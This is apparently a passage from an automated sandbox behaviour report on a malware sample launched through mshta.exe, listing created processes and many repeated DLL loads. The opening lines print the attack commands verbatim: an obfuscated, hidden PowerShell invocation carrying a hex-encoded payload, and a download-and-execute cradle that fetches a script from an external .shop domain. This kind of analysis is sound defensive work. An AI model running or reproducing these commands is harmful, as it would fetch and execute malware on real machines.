                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
